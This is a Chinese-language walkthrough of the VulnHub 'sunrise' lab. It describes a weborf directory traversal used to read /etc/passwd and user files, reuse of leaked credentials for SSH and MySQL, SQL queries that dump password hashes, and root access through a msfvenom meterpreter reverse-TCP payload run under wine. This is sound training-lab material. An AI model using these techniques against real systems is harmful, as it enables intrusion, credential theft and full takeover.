vulnhub之sunrise
认识一个新工具 nikto
他是一款网页服务检测器,针对目标IP的不同端口,可以对端口上运行的服务进行扫描。
老套路,第一步现在局域网找到目标主机
简单来分析一下:
- 22号端口 ssh连接用的(简单的弱口令 爆破 低版本的绕过或者在后面会有提示的账户密码)
- 80端口 万恶之源 (敏感目录等一系列的漏洞)
- 3306端口 mysql数据库 (可以存在sql注入 敏感目录下的wen.config 需要账户和口令)
- 8080端口 这里是weborf服务 版本0.12.2 等下查一下有没有已知的漏洞
先进入网页查看80端口下手:
403无权限 80端口暂时放过,没有什么可用的信息
8080端口:weborf服务
我们先使用nikto来扫描一下服务,顺便在使用searchsploit查看有没有已知的漏洞
应该是有这个解析之后目录遍历漏洞
初次判断 %2f 是/的url编码 之后的/etc/passwd应该目录遍历
查看有没有已知漏洞
我们确认一下,这个漏洞是否真的存在
我们还找到了两个用户名所在文件位置,我在利用目录遍历漏洞进去查看没有没需要在资料
在/home/sunrise文件夹中找到user.txt
下面进入/homr/weborf文件夹,没有发现一些敏感的文件,只有weborf程序的运行文件
使用目录扫描工具来扫描敏感目录
找到了数据库的历史操作,我们还是利用目录遍历来查看文件内容
给出了用户名和密码
使用mysql数据库管理工具,远程登录
卒
尝试ssh登录,登陆成功
敲黑板!!!划重点!!这里告诉我们什么??
千万不要使用同一个密码在不同账户中!!!!
登录到mysql中:
show databases; 看看所有的数据库
use mysql; 进入这个数据库
show tables; 看看数据库中的表
describe user;查看表结构
select User,Password from user; 显示用户名和密码
退出,使用这sunrise账户登录
我们可以看到,这个用户有root权限,就是使用wine运行的程序为root权限
简单的说一下什么是wine(纯属自己观点,请务必自行百度)
wine我感觉就是windows的程序在linux中运行前要使用的工具,比如xxx.exe典型的windows程序但要是在linux中运行的话,就需要wine xxx.exe 才能运行,感觉就像是跨平台。
这里该怎么运用呐?
我们可以使用msf制作一个简单tcp端口反射木马,通过python自带的ftp功能下载到目标靶机,使用wine(wine运行的程序是root权限)运行端口反射木马,在本机使用msfconsole接收反弹的shell,这样就可以获得root权限。
制作分为两种:
msfvenom -p windows/meterpreter/reverse_tcp lhost lport 这个在我的博客里有
https://blog.csdn.net/Lonelyhat/article/details/76281367
还有一种是比较简单的
后面填写自己本机的IP,他会在当前目录下面生成两个文件
一个是.exe 一个是.txt (exe要传到目标机器上运行的 txt是运行之前,运行之前,运行之前的说明)
先做配置,下图就是.txt中的内容
先打开msfconsole,一行一行的去执行上图的命令
反射的端口和地址都设置好了
要是觉得看不懂,还是去看看我之前文章吧(或者百度)
https://blog.csdn.net/Lonelyhat/article/details/76281367
以前,配置完成,开启python的简单的http
在目标机器中下载.exe文件并使用wine运行
这里看到,反弹回来的shell是root权限
进入root目录,查看flag
